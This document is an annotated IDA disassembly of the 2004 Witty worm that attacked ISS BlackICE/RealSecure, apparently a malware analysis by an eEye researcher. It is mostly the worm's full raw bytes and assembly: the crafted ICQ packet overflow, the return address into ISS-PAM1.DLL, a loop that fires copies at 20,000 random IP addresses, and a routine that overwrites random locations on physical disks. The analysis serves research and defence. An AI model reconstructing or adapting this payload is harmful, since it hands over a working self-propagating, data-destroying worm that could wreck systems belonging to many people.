00000000 ; 00000000 ; +-------------------------------------------------------------------------+ 00000000 ; ¦ This file is generated by The Interactive Disassembler (IDA) ¦ 00000000 ; ¦ Copyright (c) 2004 by DataRescue sa/nv, ¦ 00000000 ; +-------------------------------------------------------------------------+ 00000000 ; 00000000 ; "Witty" ISS BlackICE/RealSecure worm disassembly 00000000 ; Derek Soeder - eEye Digital Security - March 20, 2004 00000000 ; 00000000 ; File Name : witty.bin (generated from isc.incidents.org packet hex dump) 00000000 ; Format : Binary File 00000000 ; Base Address: 0000h Range: 0000h - 03E5h Loaded length: 03E5h 00000000 00000000 ISS-PAM1.DLL @ base 5E000000h 00000000 00000000 ICQ server response packet header 00000000 (http://www.cs.berkeley.edu/~mikechen/im/protocols/icq/icqv5.html) 00000000 00000000 00000000 ; --------------------------------------------------------------------------- 00000000 00000000 ; Segment type: Pure code 00000000 seg000 segment byte public 'CODE' use32 00000000 assume cs:seg000 00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing 00000000 05 00 dw 5 ; Header: Protocol version 00000002 00 db 0 00000003 00 00 00 00 dd 0 ; Header: Session ID 00000007 12 02 dw 212h ; Header: Command = SRV_MULTI (0212h) 00000009 00 00 dw 0 ; Header: Sequence number 1 0000000B 00 00 dw 0 ; Header: Sequence number 2 0000000D 00 00 00 00 dword_D dd 0 ; Header: Client's UIN 00000011 00 00 00 00 dd 0 ; Header: Checkcode 00000015 02 db 2 ; SRV_MULTI: Number of packets 00000016 2C 00 dw 2Ch ; SRV_MULTI: Size of packet #1 00000018 05 00 dw 5 ; #1 Header: Protocol version 0000001A 00 db 0 0000001B 00 00 00 00 dd 0 ; #1 Header: Session ID 0000001F 6E 00 word_1F dw 6Eh ; #1 Header: Command = SRV_USER_ONLINE (006Eh) 00000021 00 00 dw 0 ; #1 Header: Sequence number 1 00000023 00 00 dw 0 ; #1 Header: Sequence number 2 00000025 00 00 00 00 dd 0 ; #1 Header: Client's UIN 00000029 00 00 00 00 dd 0 ; #1 Header: Checkcode 0000002D 00 00 00 00 dd 0 ; #1 SRV_USER_ONLINE: Online user's UIN 00000031 01 00 00 00 db 1, 0, 0, 0 ; #1 SRV_USER_ONLINE: Online user's IP address 00000035 00 00 00 00 dd 0 ; #1 SRV_USER_ONLINE: Online user's listening port 00000039 00 00 00 00 db 0, 0, 0, 0 ; #1 SRV_USER_ONLINE: Online user's real IP address 0000003D 00 db 0 0000003E 00 00 00 00 dd 0 ; #1 SRV_USER_ONLINE: Online user's new status 00000042 00 db 0 00000043 00 db 0 00000044 41 02 dw 241h ; SRV_MULTI: Size of packet #2 00000046 05 00 dw 5 ; #2 Header: Protocol version 00000048 00 db 0 00000049 00 00 00 00 dd 0 ; #2 Header: Session ID 0000004D DE 03 dw 3DEh ; #2 Header: Command = SRV_META_USER (03DEh) 0000004F 00 00 dw 0 ; #2 Header: Sequence number 1 00000051 00 00 dw 0 ; #2 Header: Sequence number 2 00000053 00 00 00 00 dd 0 ; #2 Header: Client's UIN 00000057 00 00 00 00 dd 0 ; #2 Header: Checkcode 0000005B 00 00 dw 0 ; #2 SRV_META_USER: Subcommand 0000005D 00 db 0 ; #2 SRV_META_USER: Result 0000005E 01 00 dw 1 ; #2 SRV_META_USER: 'nickname' length 00000060 00 db 0 ; #2 SRV_META_USER: 'nickname' string data 00000061 01 00 dw 1 ; #2 SRV_META_USER: 'first name' length 00000063 00 db 0 ; #2 SRV_META_USER: 'first name' string data 00000064 01 00 dw 1 ; #2 SRV_META_USER: 'last name' length 00000066 00 db 0 ; #2 SRV_META_USER: 'last name' string data 00000067 1E 02 dw 21Eh ; #2 SRV_META_USER: 'e-mail' length 00000069 20 20 20 20 20 20+a_InsertWittyMe db ' (^.^) insert witty message here. (^.^) ' ; <--- 00000069 20 28 5E 2E 5E 29+ db ' ' ; #2 SRV_META_USER: 'e-mail' string data start 000000A7 ; --------------------------------------------------------------------------- 000000A7 000000A7 Start of payload code 000000A7 000000A7 000000A7 loc_A7: ; CODE XREF: 00000281vj 000000A7 89 E7 mov edi, esp ; begin worm payload 000000A9 8B 7F 14 mov edi, [edi+14h] 000000AC 83 C7 08 add edi, 8 000000AF 81 C4 E8 FD FF FF add esp, 0FFFFFDE8h ; ESP -= 218h; this is done to keep stack use from 000000AF ; clobbering the payload code, since it is on the stack 000000AF ; 000000AF ; prior to this instruction, ESP is pointing to the JMP 000000AF ; instruction following the return address; after 000000AF ; subtracting, ESP now points to the beginning of the 000000AF ; 'e-mail' string at offset 0069h 000000B5 000000B5 Create UDP/IP socket 000000B5 000000B5 31 C9 xor ecx, ecx 000000B7 66 B9 33 32 mov cx, 3233h ; "32" 000000BB 51 push ecx 000000BC 68 77 73 32 5F push 5F327377h ; "ws2_" 000000C1 54 push esp 000000C2 db 3Eh 000000C2 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; GetModuleHandleA 000000C2 5E ; *** Visual C++ 6 and 7's __asm directive will not compile 000000C2 ; *** "call dword ptr [offset]" without a "ds:" prefix 000000C2 ; *** (i.e., "call dword ptr ds:[offset]"), but will output 000000C2 ; *** the DS: segment prefix byte (3Eh) on such instructions 000000C9 89 C3 mov ebx, eax 000000CB 31 C9 xor ecx, ecx 000000CD 66 B9 65 74 mov cx, 7465h ; "et" 000000D1 51 push ecx 000000D2 68 73 6F 63 6B push 6B636F73h ; "sock" 000000D7 54 push esp 000000D8 53 push ebx 000000D9 db 3Eh 000000D9 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; GetProcAddress 000000E0 6A 11 push 11h ; int protocol = IPPROTO_UDP 000000E2 6A 02 push 2 ; int type = SOCK_DGRAM 000000E4 6A 02 push 2 ; int af = AF_INET 000000E6 FF D0 call eax ; ws2_32!socket() 000000E8 89 C6 mov esi, eax 000000EA 000000EA Bind to local port UDP/4000 000000EA 000000EA 31 C9 xor ecx, ecx 000000EC 51 push ecx ; '\0' 000000ED 68 62 69 6E 64 push 646E6962h ; "bind" 000000F2 54 push esp 000000F3 53 push ebx 000000F4 db 3Eh 000000F4 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; GetProcAddress 000000FB 31 C9 xor ecx, ecx 000000FD 51 push ecx ; sockaddr_in.sin_zero[4..7] 000000FE 51 push ecx ; sockaddr_in.sin_zero[0..3] 000000FF 51 push ecx ; sockaddr_in.sin_addr.S_addr = INADDR_ANY 00000100 81 E9 FE FF F0 5F sub ecx, 5FF0FFFEh ; = A00F0002h 00000106 51 push ecx ; sockaddr_in.sin_family = AF_INET 00000106 ; sockaddr_in.sin_port = htons(4000) 00000107 89 E1 mov ecx, esp 00000109 6A 10 push 10h ; int namelen 0000010B 51 push ecx ; sockaddr *addr 0000010C 56 push esi ; SOCKET s 0000010D FF D0 call eax ; ws2_32!bind 0000010F 0000010F Retrieve ws2_32!sendto() function pointer for propagation loop 0000010F 0000010F 31 C9 xor ecx, ecx 00000111 66 B9 74 6F mov cx, 6F74h ; "to" 00000115 51 push ecx 00000116 68 73 65 6E 64 push 646E6573h ; "send" 0000011B 54 push esp 0000011C 53 push ebx 0000011D db 3Eh 0000011D 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; GetProcAddress 00000124 89 C3 mov ebx, eax 00000126 83 C4 3C add esp, 3Ch 00000129 00000129 Main worm payload loop, repeats infinitely 00000129 00000129 loc_129: ; CODE XREF: 00000278vj 00000129 31 C9 xor ecx, ecx ; begin worm payload loop 0000012B 51 push ecx 0000012C 68 65 6C 33 32 push 32336C65h ; "el32" 00000131 68 6B 65 72 6E push 6E72656Bh ; "kern" 00000136 54 push esp 00000137 db 3Eh 00000137 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; GetModuleHandleA 0000013E 31 C9 xor ecx, ecx 00000140 51 push ecx 00000141 68 6F 75 6E 74 push 746E756Fh ; "ount" 00000146 68 69 63 6B 43 push 436B6369h ; "ickC" 0000014B 68 47 65 74 54 push 54746547h ; "GetT" 00000150 54 push esp 00000151 50 push eax 00000152 db 3Eh 00000152 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; GetProcAddress 00000159 FF D0 call eax ; kernel32!GetTickCount 0000015B 89 C5 mov ebp, eax ; seed PRNG with GetTickCount() return 0000015D 83 C4 1C add esp, 1Ch 00000160 31 C9 xor ecx, ecx 00000162 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; ECX = 20000 00000168 00000168 Propagation loop, iterates 20,000 times 00000168 00000168 loc_168: ; CODE XREF: 000001CEvj 00000168 ; 0000022Bvj 00000168 51 push ecx ; begin propagation loop 00000169 00000169 Choose a random IP address and destination port 00000169 00000169 An interesting side effect of this serial use of the PRNG is 00000169 that a single IP address should almost always receive packets 00000169 of the same size, even though the packet size is randomized. 00000169 This is because, in order to generate a given IP address, the 00000169 PRNG must first generate a number of the form BBAAxxxxh, which 00000169 is then used as the seed to generate DDCCxxxxh (where the IP 00000169 address is AAh.BBh.CCh.DDh). Although theoretically possible, 00000169 there should never be multiple ways to generate these two 00000169 numbers in sequence for a given IP address; therefore, the 00000169 PRNG should always be in the same state following the 00000169 generation of any particular IP. 00000169 00000169 31 C0 xor eax, eax 0000016B 2D 03 BC FC FF sub eax, 0FFFCBC03h ; +343FDh 00000170 F7 E5 mul ebp 00000172 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; +269EC3h 00000177 89 C1 mov ecx, eax ; ECX = (EBP * 343FDh) + 269EC3h 00000179 31 C0 xor eax, eax 0000017B 2D 03 BC FC FF sub eax, 0FFFCBC03h ; +343FDh 00000180 F7 E1 mul ecx 00000182 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; +269EC3h 00000187 89 C5 mov ebp, eax ; EBP = EAX = (ECX * 343FDh) + 269EC3h 00000189 31 D2 xor edx, edx 0000018B 52 push edx ; sockaddr_in.sin_zero[4..8] 0000018C 52 push edx ; sockaddr_in.sin_zero[0..3] 0000018D C1 E9 10 shr ecx, 10h 00000190 66 89 C8 mov ax, cx 00000193 50 push eax ; sockaddr_in.sin_addr.S_addr = (random) 00000194 31 C0 xor eax, eax 00000196 2D 03 BC FC FF sub eax, 0FFFCBC03h ; +343FDh 0000019B F7 E5 mul ebp 0000019D 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; +269EC3h 000001A2 89 C5 mov ebp, eax ; EBP = EAX = (EBP * 343FDh) + 269EC3h 000001A4 30 E4 xor ah, ah ; sockaddr_in.sin_port = (random) 000001A6 B0 02 mov al, 2 ; sockaddr_in.sin_family = AF_INET 000001A8 50 push eax ; sockaddr_in.sin_family / .sin_port 000001A9 000001A9 Send worm packet of random size to target 000001A9 000001A9 89 E0 mov eax, esp 000001AB 6A 10 push 10h ; int tolen 000001AD 50 push eax ; sockaddr *to 000001AE 31 C0 xor eax, eax 000001B0 50 push eax ; int flags = 0 000001B1 2D 03 BC FC FF sub eax, 0FFFCBC03h ; +343FDh 000001B6 F7 E5 mul ebp 000001B8 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; +269EC3h 000001BD 89 C5 mov ebp, eax ; EBP = EAX = (EBP * 343FDh) + 269EC3h 000001BF C1 E8 17 shr eax, 17h ; 17h = 23 decimal; 2**23 == 0x00800000 000001C2 80 C4 03 add ah, 3 000001C5 50 push eax ; int len = (WORD)((random:0..1FFh) + 300h) 000001C6 57 push edi ; char * buf 000001C7 56 push esi ; SOCKET s 000001C8 FF D3 call ebx ; ws2_32!sendto 000001CA 83 C4 10 add esp, 10h 000001CD 59 pop ecx 000001CE E2 98 loop loc_168 ; begin propagation loop 000001D0 000001D0 Destructive payload 000001D0 000001D0 Open a random physical disk drive for low-level access 000001D0 000001D0 31 C0 xor eax, eax 000001D2 2D 03 BC FC FF sub eax, 0FFFCBC03h ; +343FDh 000001D7 F7 E5 mul ebp 000001D9 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; +269EC3h 000001DE 89 C5 mov ebp, eax 000001E0 C1 E8 10 shr eax, 10h 000001E3 80 E4 07 and ah, 7 000001E6 80 CC 30 or ah, 30h 000001E9 B0 45 mov al, 45h ; 'E' 000001EB 50 push eax ; "E" + (random:'0'..'7') 000001EC 68 44 52 49 56 push 56495244h ; "DRIV" 000001F1 68 49 43 41 4C push 4C414349h ; "ICAL" 000001F6 68 50 48 59 53 push 53594850h ; "PHYS" 000001FB 68 5C 5C 2E 5C push 5C2E5C5Ch ; "\\.\" 00000200 89 E0 mov eax, esp 00000202 31 C9 xor ecx, ecx 00000204 51 push ecx ; HANDLE hTemplateFile = NULL 00000205 B2 20 mov dl, 20h 00000207 C1 E2 18 shl edx, 18h 0000020A 52 push edx ; DWORD dwFlagsAndAttributes = 0000020A ; FILE_FLAG_NO_BUFFERING (20000000h) 0000020B 6A 03 push 3 ; DWORD dwCreationDisposition = OPEN_EXISTING 0000020D 51 push ecx ; LPSECURITY_ATTRIBUTES lpSecurityAttributes = NULL 0000020E 6A 03 push 3 ; DWORD dwShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 00000210 D1 E2 shl edx, 1 00000212 52 push edx ; DWORD dwDesiredAccess = GENERIC_WRITE (40000000h) 00000213 50 push eax ; LPCSTR lpFileName = "\\.\PHYSICALDRIVE" + ['0'..'7'] 00000214 db 3Eh 00000214 3E FF 15 DC 40 0D+ call dword ptr ds:5E0D40DCh ; CreateFileA 0000021B 83 C4 14 add esp, 14h 0000021E 31 C9 xor ecx, ecx 00000220 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; ECX = 20000 00000226 3D FF FF FF FF cmp eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE 00000226 ; *** this instruction's byte code is 3Dh/FFh/FFh/FFh/FFh 00000226 ; *** (CMP EAX, imm32), not 83h/F8h/FFh (CMP EAX, simm8), 00000226 ; *** which is what would be expected; VC6 and VC7 cannot 00000226 ; *** be made to generate this longer byte code 0000022B 0F 84 37 FF FF FF jz loc_168 ; begin propagation loop 00000231 00000231 Seek to a random location on the disk 00000231 00000231 56 push esi 00000232 89 C6 mov esi, eax 00000234 31 C0 xor eax, eax 00000236 50 push eax ; DWORD dwMoveMethod = FILE_BEGIN (0) 00000237 50 push eax ; PLONG lpDistanceToMoveHigh = NULL 00000238 2D 03 BC FC FF sub eax, 0FFFCBC03h ; +343FDh 0000023D F7 E5 mul ebp 0000023F 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; +269EC3h 00000244 89 C5 mov ebp, eax ; EBP = EAX = (EBP * 343FDh) + 269EC3h 00000246 D1 E8 shr eax, 1 00000248 66 89 C8 mov ax, cx 0000024B 50 push eax ; LONG lDistanceToMove = ((random:0..7FFFh) << 16) | 4E20h 0000024C 56 push esi ; HANDLE hFile 0000024D db 3Eh 0000024D 3E FF 15 C4 40 0D+ call dword ptr ds:5E0D40C4h ; SetFilePointer 00000254 00000254 Write 64KB of junk (from ISS-PAM1.DLL header) 00000254 00000254 31 C9 xor ecx, ecx 00000256 51 push ecx 00000257 89 E2 mov edx, esp 00000259 51 push ecx ; LPOVERLAPPED lpOverlapped = NULL 0000025A 52 push edx ; LPDWORD lpNumberOfBytesWritten = EDX -> 0000025A ; space allocated by "PUSH ECX" above 0000025B B5 80 mov ch, 80h 0000025D D1 E1 shl ecx, 1 0000025F 51 push ecx ; DWORD nNumberOfBytesToWrite = 10000h 00000260 B1 5E mov cl, 5Eh 00000262 C1 E1 18 shl ecx, 18h 00000265 51 push ecx ; LPCVOID lpBuffer = 5E000000h -> ISS-PAM1.DLL base 00000266 56 push esi ; HANDLE hFile 00000267 db 3Eh 00000267 3E FF 15 94 40 0D+ call dword ptr ds:5E0D4094h ; WriteFile 0000026E 0000026E Close handle and continue worm payload loop 0000026E 0000026E 56 push esi ; HANDLE hObject 0000026F db 3Eh 0000026F 3E FF 15 38 40 0D+ call dword ptr ds:5E0D4038h ; CloseHandle 00000276 5E pop esi 00000277 5E pop esi 00000278 E9 AC FE FF FF jmp loc_129 ; begin worm payload loop 00000278 ; --------------------------------------------------------------------------- 0000027D 63 76 07 5E dd 5E077663h ; RETURN ADDRESS (ISS-PAM1.DLL) --> JMP ESP??? 00000281 ; --------------------------------------------------------------------------- 00000281 E9 21 FE FF FF jmp loc_A7 ; begin worm payload 00000281 ; --------------------------------------------------------------------------- 00000286 00 db 0 ; 'e-mail' string null terminator 00000286 00000286 --- End of payload data --- 00000286 00000287 00000287 Beginning of residual data preserved from an initial infection 00000287 00000287 43 66 6A 76 63 6C+aCfjvclb41pq50j db 'Cfjvclb41PQ50jH1Pc4PQUYHx7teOzTSTYTeLMA',0Dh,0Ah 00000287 62 34 31 50 51 35+ db 'DlD3R7lVtBCukkhdz+2vou03Ac5WORkuqrgdKru1ZIOClSR/xQOiKo6HzJug' 00000287 30 6A 48 31 50 63+ db 'RrI4s7OkSKwPqLu4',0Dh,0Ah 00000287 34 50 51 55 59 48+ db '5b' 00000300 00000300 Beginning of randomly accumulated residual data 00000300 00000300 61 4E 62 52 30 67+aAnbr0gpnyp db 'aNbR0gPNYP' 0000030A 40 00 dw 40h 0000030C 34 db 34h 0000030D 06 db 6 0000030E B6 db 0B6h 0000030F 62 db 62h 00000310 40 db 40h 00000311 44 db 44h 00000312 52 db 52h 00000313 19 db 19h 00000314 92 db 92h 00000315 8E db 8Eh 00000316 04 db 4 00000317 42 67 41 62 41 46+aBgabaf0edaawaa db 'BgAbAF0EDAAWAAAAAAAAAA183' 00000330 22 db 22h 00000331 3E db 3Eh 00000332 0A db 0Ah 00000333 20 db 20h 00000334 20 db 20h 00000335 20 db 20h 00000336 20 db 20h 00000337 20 db 20h 00000338 80 01 00 00 dd 180h 0000033C 46 00 00 00 dd 46h 00000340 46 00 00 00 dd 46h 00000344 80 00 00 00 dd 80h 00000348 02 00 00 00 dd 2 0000034C 66 db 66h 0000034D CC db 0CCh 0000034E 5B db 5Bh 0000034F 40 db 40h 00000350 EF db 0EFh 00000351 1C db 1Ch 00000352 0D db 0Dh 00000353 00 db 0 00000354 83 db 83h 00000355 E1 db 0E1h 00000356 00 db 0 00000357 B0 db 0B0h 00000358 11 00 dw 11h 0000035A 06 00 dw 6 0000035C D0 03 00 00 dd 3D0h 00000360 D0 03 00 00 dd 3D0h 00000364 00 04 00 00 dd 400h 00000368 02 00 00 00 dd 2 0000036C AA db 0AAh 0000036D CC db 0CCh 0000036E 5B db 5Bh 0000036F 40 db 40h 00000370 0E db 0Eh 00000371 27 db 27h 00000372 07 db 7 00000373 00 db 0 00000374 83 db 83h 00000375 E1 db 0E1h 00000376 00 db 0 00000377 00 db 0 00000378 00 db 0 00000379 00 db 0 0000037A 00 db 0 0000037B 02 db 2 0000037C 00 db 0 0000037D B0 db 0B0h 0000037E D0 db 0D0h 0000037F 2B db 2Bh 00000380 A4 db 0A4h 00000381 9B db 9Bh 00000382 08 db 8 00000383 00 db 0 00000384 45 db 45h 00000385 00 db 0 00000386 03 db 3 00000387 C2 db 0C2h 00000388 0A db 0Ah 00000389 72 db 72h 0000038A 00 db 0 0000038B 00 db 0 0000038C 80 db 80h 0000038D 11 db 11h 0000038E 00 db 0 0000038F 00 db 0 00000390 83 db 83h 00000391 E1 db 0E1h 00000392 1B db 1Bh 00000393 B1 db 0B1h 00000394 BA db 0BAh 00000395 54 db 54h 00000396 02 db 2 00000397 A2 db 0A2h 00000398 0F db 0Fh 00000399 A0 db 0A0h 0000039A 06 db 6 0000039B A5 db 0A5h 0000039C 03 db 3 0000039D AE db 0AEh 0000039E EB db 0EBh 0000039F 72 db 72h 000003A0 05 00 dw 5 000003A2 00 db 0 000003A3 00 00 00 00 dd 0 000003A7 12 02 dw 212h 000003A9 00 00 dw 0 000003AB 00 00 dw 0 000003AD 00 00 00 00 dd 0 000003B1 00 00 00 00 dd 0 000003B5 02 db 2 000003B6 2C 00 dw 2Ch 000003B8 05 00 dw 5 ; Header: Protocol version 000003BA 00 db 0 000003BB 00 00 00 00 dd 0 ; Header: Session ID 000003BF 6E 00 dw 6Eh ; Header: Command = SRV_USER_ONLINE (006Eh) 000003C1 00 00 dw 0 ; Header: Sequence number 1 000003C3 00 00 dw 0 ; Header: Sequence number 2 000003C5 00 00 00 00 dd 0 ; Header: Client's UIN 000003C9 00 00 32 5E dd 5E320000h 000003CD 80 1D 33 1D dd 1D331D80h 000003D1 20 0C 95 83 dd 83950C20h 000003D5 10 16 7B 11 dd 117B1610h 000003D9 00 db 0 000003DA 07 db 7 000003DB 00 db 0 000003DC 46 00 00 00 dd 46h 000003E0 46 00 00 00 dd 46h 000003E4 80 db 80h 000003E4 seg000 ends 000003E4 000003E4 000003E4 end